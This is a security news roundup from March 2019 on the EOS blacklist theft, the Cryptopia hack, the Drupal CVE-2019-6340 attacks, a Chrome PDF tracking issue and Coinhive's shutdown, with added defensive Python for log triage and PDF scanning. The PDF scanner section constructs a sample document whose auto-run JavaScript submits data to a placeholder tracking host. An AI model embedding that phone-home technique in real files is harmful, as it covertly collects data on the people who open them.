Last Week In Blockchain and CyberSecurity News - March 5, 2019

Hacker Steals $7.7 Million In EOS Cryptocurrency After Blacklist Snafu

On Saturday, February 23, EOS42, a web-based community of EOS cryptocurrency owners, disclosed a hack in a public Telegram post. Reportedly, the hack occurred when a newly rotated EOS block producer (BP) named “games.eos” failed to apply the blacklist for EOS mainnet accounts. The blacklist is a feature of the EOS blockchain that relies on block producers to maintain and enforce a list of compromised accounts: each BP refuses to include transactions from blacklisted accounts in the blocks it produces. Because the 21 active BPs take turns producing blocks, enforcement only holds if every one of them applies the list; a single BP that has not applied it will include the transaction when its production slot comes around. “If only one top 21 BP does not have an updated blacklist, hacked accounts are vulnerable to being emptied,” said the EOS42 team in a Medium blog post. The procedure was put in place to stop funds moving out of compromised accounts, but in this incident it failed at its weakest link. EOS42 further explained that the “scenario played out [during the hack] is when a newly rotated top 21 BP [fails] to apply the blacklist.” Because “games.eos” had not applied the blacklist, an anonymous hacker was able to move 2.09 million EOS (about $7.7 million) from a frozen, previously hacked account to several wallets at various cryptocurrency exchanges.
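To make the failure mode concrete, here is an added Python model (not EOS code and not from EOS42's post) of blacklist enforcement by rotating block producers. A BP is reduced to "skip transactions whose sender is on my local blacklist when it is my turn to produce a block". The BP names other than games.eos, the account name hacked.acct and the receiver name are placeholders constructed for the example.

```python
"""Model of EOS-style blacklist enforcement by rotating block producers.

Added illustration, not EOS code. Each active BP keeps its own local
blacklist and skips transactions from blacklisted senders only in the
blocks it produces. Enforcement is therefore N-of-N: one BP that has not
applied the list includes the transaction during its own slot.
"""
from dataclasses import dataclass
from itertools import cycle


@dataclass(frozen=True)
class Tx:
    sender: str
    receiver: str
    amount: float


@dataclass
class BlockProducer:
    name: str
    blacklist: frozenset = frozenset()   # this BP's locally applied list

    def produce_block(self, mempool):
        """Include every pending tx except those from blacklisted senders.

        Returns (included, still_pending)."""
        included = [tx for tx in mempool if tx.sender not in self.blacklist]
        pending = [tx for tx in mempool if tx.sender in self.blacklist]
        return included, pending


def run_rounds(producers, mempool, rounds):
    """Rotate through the active BPs for `rounds` full rotations.

    Returns a list of (bp_name, tx) pairs for transactions that made it
    onto the chain, i.e. the BP that let each one through."""
    chain = []
    pending = list(mempool)
    order = cycle(producers)
    for _ in range(rounds * len(producers)):
        bp = next(order)
        included, pending = bp.produce_block(pending)
        chain.extend((bp.name, tx) for tx in included)
        if not pending:
            break
    return chain


def weakest_link(producers, account):
    """Names of active BPs that have NOT applied the blacklist for `account`."""
    return [bp.name for bp in producers if account not in bp.blacklist]


# Constructed scenario: 20 compliant BPs plus one newly rotated BP that has
# not applied the list. "hacked.acct" and "exchange.deposit" are placeholders.
FROZEN = "hacked.acct"
OFFICIAL_LIST = frozenset({FROZEN})
compliant = [BlockProducer(f"bp{i:02d}", OFFICIAL_LIST) for i in range(20)]
laggard = BlockProducer("games.eos")          # blacklist never applied
producers = compliant + [laggard]
theft = Tx(FROZEN, "exchange.deposit", 2_090_000)

if __name__ == "__main__":
    print("BPs not enforcing:", weakest_link(producers, FROZEN))
    print("with laggard   :", run_rounds(producers, [theft], rounds=1))
    print("all compliant  :", run_rounds(compliant, [theft], rounds=3))
```

With all 20 compliant BPs the transaction sits in the mempool forever; add the one BP without the list and it is included in the first block that BP produces. The check a BP operator actually wants is the one `weakest_link` performs: confirm that every active producer, including any that just rotated in, has the current list before assuming a frozen account is frozen.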

Hacked Exchange Cryptopia Discloses Estimate of Stolen Crypto

Over the past month we have been following the Cryptopia exchange hack, which took the exchange offline after it reported a “security breach which resulted in significant losses.” The exchange provided little detail on what specifically occurred while the New Zealand Police conducted their investigation. Blockchain analytics firms have estimated that as much as $16 million in Ether and ERC-20 tokens was stolen from the exchange, but no official figure was given until last week. In a series of tweets, Cryptopia stated that they “are continuing to work on assessing the impact incurred as a result of the hack in January. Currently, [they] have calculated that worst case 9.4% of [their] total holdings was stolen.” Although this statement gives no monetary amount, 9.4% of an exchange's total holdings is a large loss. Cryptopia also states that it is securing each wallet individually and that the exchange will reopen “as read-only” by March 4th.

Cryptocurrency Miners Exploit Latest Drupal Flaw

Within a couple of days of Drupal urging site administrators to apply an update for a highly critical vulnerability in the content management system (CMS), threat actors were seen targeting unpatched systems. The vulnerability (CVE-2019-6340, Drupal advisory SA-CORE-2019-003) arises because some field types do not properly sanitize data from non-form sources. It is exposed when the Drupal 8 core RESTful Web Services module is enabled and allows PATCH or POST requests, or when another web services module such as JSON:API is enabled. Exploiting it allows arbitrary PHP remote code execution, which can lead to full compromise of the web server; the advisory's interim mitigation for sites that could not patch immediately was to disable the web services modules or configure the web server to reject PUT, PATCH and POST requests to web services resources. The day after the update went live, a proof-of-concept exploit was published online, followed by a wave of attacks. Some attacks injected a JavaScript-based cryptocurrency miner called CoinIMP into compromised sites, which hijacks visitors' browsers to mine virtual currency (Monero and others). Others used the exploit to install a web shell, letting attackers upload arbitrary files to unpatched Drupal sites.
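As an added example (not from the article and not Drupal code), the following Python triage script turns that interim mitigation into a detection rule and runs it over constructed access-log lines in the common "combined" format: it flags PUT, PATCH and POST requests to REST resources (`?_format=hal_json` or `?_format=json`) or JSON:API resources (`/jsonapi/...`). The IP addresses, paths and timestamps are constructed, and the rule is a heuristic for exposure of the vulnerable code path, not a signature for any particular payload.

```python
"""Heuristic access-log triage for CVE-2019-6340 exploitation attempts.

Added example, not from the original article or from Drupal. Only
PUT/PATCH/POST requests to web-services resources can reach the vulnerable
deserialization path, so those are the requests worth alerting on.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" log format (timestamp, request line, status, size).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

WRITE_METHODS = {"POST", "PUT", "PATCH"}
REST_FORMATS = {"hal_json", "json"}     # formats served by the core REST module


def is_web_services_request(target):
    """True if the request path/query targets a Drupal web-services resource."""
    parts = urlsplit(target)
    if parts.path == "/jsonapi" or parts.path.startswith("/jsonapi/"):
        return True
    formats = parse_qs(parts.query).get("_format", [])
    return any(f in REST_FORMATS for f in formats)


def suspicious(line):
    """Parse one log line; return its fields if it matches the rule, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    if rec["method"] in WRITE_METHODS and is_web_services_request(rec["target"]):
        return rec
    return None


def triage(lines):
    """All records from `lines` that match the rule, in log order."""
    return [rec for rec in (suspicious(line) for line in lines) if rec]


# Constructed sample log: two read requests, three write attempts against
# REST/JSON:API resources, and an ordinary login POST that must not fire.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Feb/2019:10:01:02 +0000] "GET /node/1 HTTP/1.1" 200 5123
203.0.113.5 - - [26/Feb/2019:10:01:05 +0000] "GET /node/1?_format=hal_json HTTP/1.1" 200 812
198.51.100.7 - - [26/Feb/2019:10:02:11 +0000] "POST /node/1?_format=hal_json HTTP/1.1" 200 93
198.51.100.7 - - [26/Feb/2019:10:02:12 +0000] "PATCH /node/1?_format=hal_json HTTP/1.1" 403 0
198.51.100.9 - - [26/Feb/2019:10:03:40 +0000] "POST /jsonapi/node/article HTTP/1.1" 405 0
192.0.2.44 - - [26/Feb/2019:10:04:00 +0000] "POST /user/login HTTP/1.1" 302 0
"""

if __name__ == "__main__":
    for rec in triage(SAMPLE_LOG.splitlines()):
        print(rec["ip"], rec["method"], rec["target"], rec["status"])
```

Blocked attempts (403, 405) are reported alongside the successful one on purpose: a 200 on a POST to `?_format=hal_json` from an unknown source is the line to investigate first, but the rejected requests show who was probing and when. Because the rule is method plus resource rather than payload content, it still fires when the body is encrypted in transit or truncated from the log.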

Google Chrome Bug Used In The Wild To Collect User Data Via PDF Files

An exploit detection service named EdgeSpot claims it has discovered a vulnerability, used in the wild, that allows attackers to collect data from users who open PDF files in Chrome’s built-in PDF viewer. EdgeSpot stated that the PDF documents contact a remote domain and send information about the user's environment, such as IP address, OS version, Chrome version, and the local path of the PDF file on the user's computer. The researchers saw no suspicious activity when the PDFs were opened in other readers such as Adobe Reader, but outbound traffic was detected when they were opened in Chrome. Collecting this kind of reconnaissance data on the people who open a PDF can help attackers tailor their later attacks. Security researcher Patrick Wardle analyzed the PDFs and stated that the issue lies in Chrome not alerting users when a PDF submits data to a remote server, which is what allows this type of tracking. He believes it should not be classified as a “zero-day.” EdgeSpot notified Google about the issue and has been promised a fix by the end of April. EdgeSpot recommends using a different PDF viewer, or disconnecting from the network while opening PDFs in Chrome.
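The practical question for a defender is how to tell, before opening a document, whether it will phone home. The following Python scanner is an added example, not code from EdgeSpot, Google or the original article. It assumes the data is sent by one of two standard PDF mechanisms, a JavaScript action that calls the Acrobat JS API `this.submitForm()`, or a `/SubmitForm` action; which mechanism the real samples used is not stated on this page. Both PDFs are constructed inline, `tracker.example` is a placeholder domain, and the tracking sample hides its script inside a compressed stream so the scanner has to inflate `/FlateDecode` objects to see it.

```python
"""Static triage of a PDF for "phone home on open" behaviour.

Added example, not from EdgeSpot, Google or the original article. It looks
for three things: an action that runs automatically on open (/OpenAction),
a JavaScript action, and a form submission (JS submitForm() or a
/SubmitForm action), plus any URL the document carries. Compressed
objects are inflated first, because that is where such scripts usually hide.
"""
import re
import zlib

URL_RE = re.compile(rb"https?://[^\s\)\"'>]+")
STREAM_HDR_RE = re.compile(rb"<<([^>]*/FlateDecode[^>]*)>>\s*stream\r?\n")
LENGTH_RE = re.compile(rb"/Length\s+(\d+)\b(?!\s+\d+\s+R)")   # direct ints only

INDICATORS = {
    "auto-run action on open (/OpenAction)": rb"/OpenAction",
    "JavaScript action": rb"/S\s*/JavaScript",
    "form submission (JS submitForm or /SubmitForm action)": rb"submitForm|/S\s*/SubmitForm",
}


def expand_streams(data):
    """Return `data` followed by the inflated bodies of its /FlateDecode streams."""
    parts = [data]
    for m in STREAM_HDR_RE.finditer(data):
        start = m.end()
        length = LENGTH_RE.search(m.group(1))
        if length:
            body = data[start:start + int(length.group(1))]
        else:   # indirect /Length reference: fall back to the endstream keyword
            body = data[start:data.find(b"endstream", start)].rstrip(b"\r\n")
        try:
            parts.append(zlib.decompress(body))
        except zlib.error:
            pass    # not really Flate data; skip it
    return b"\n".join(parts)


def triage_pdf(data):
    """Return (verdict, matched_indicators, urls) for raw PDF bytes."""
    blob = expand_streams(data)
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, blob)]
    urls = sorted({u.decode("latin-1") for u in URL_RE.findall(blob)})
    submits = any("form submission" in h for h in hits)
    auto_runs = any("auto-run" in h for h in hits)
    if submits and auto_runs and urls:
        verdict = "phones home on open"
    elif hits:
        verdict = "review"
    else:
        verdict = "clean"
    return verdict, hits, urls


def build_pdf(objects):
    """Assemble a minimal PDF body from object byte strings (no xref table)."""
    return b"%PDF-1.4\n" + b"".join(objects) + b"trailer << /Root 1 0 R >>\n%%EOF\n"


# Constructed samples. tracker.example is a placeholder domain.
PAGE_OBJS = (
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
)
BENIGN_PDF = build_pdf([b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n", PAGE_OBJS])

JS = b'this.submitForm({cURL: "http://tracker.example/collect", cSubmitAs: "HTML"});'
_compressed = zlib.compress(JS)
TRACKING_PDF = build_pdf([
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n",
    PAGE_OBJS,
    b"4 0 obj << /Type /Action /S /JavaScript /JS 5 0 R >> endobj\n",
    b"5 0 obj << /Length %d /Filter /FlateDecode >>\nstream\n" % len(_compressed)
    + _compressed + b"\nendstream\nendobj\n",
])

if __name__ == "__main__":
    for label, pdf in (("benign", BENIGN_PDF), ("tracking", TRACKING_PDF)):
        print(label, triage_pdf(pdf))
```

The verdict deliberately needs all three pieces (runs on open, submits a form, has somewhere to send it) before calling a file a tracker; a document with JavaScript alone is only "review". The scanner only understands Flate compression and direct-integer `/Length` values, so a production tool would also handle object streams, other filters and string obfuscation, but the indicators it looks for are the same ones.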

Coinhive In-Browser Cryptomining Service Shuts Down on March 8

Coinhive pitched itself as an alternative to advertising that tracks online activity or disrupts visitors: a piece of JavaScript embedded in a web page used visitors' computers to mine Monero, Coinhive kept a percentage, and the website operator kept the rest. Unfortunately, criminals found it an easy way to make money, compromising thousands of unpatched websites and running Coinhive on them to “cryptojack” their visitors. Recently, Coinhive announced that it would discontinue its service on March 8, 2019. The developers state that the service is no longer economically viable, noting that the last Monero hard fork “led to a 50% decrease in hash rate and the YoY depreciation of the XMR currency.” Coinhive also said that all mining would automatically stop after March 8. The service dashboard will remain accessible until April 30, 2019, so that Coinhive customers can initiate payouts. The shutdown also ends the Coinhive-powered cryptojacking campaigns attackers have run over the past several months. However, it will not be long before malicious actors switch to other in-browser JavaScript cryptomining libraries.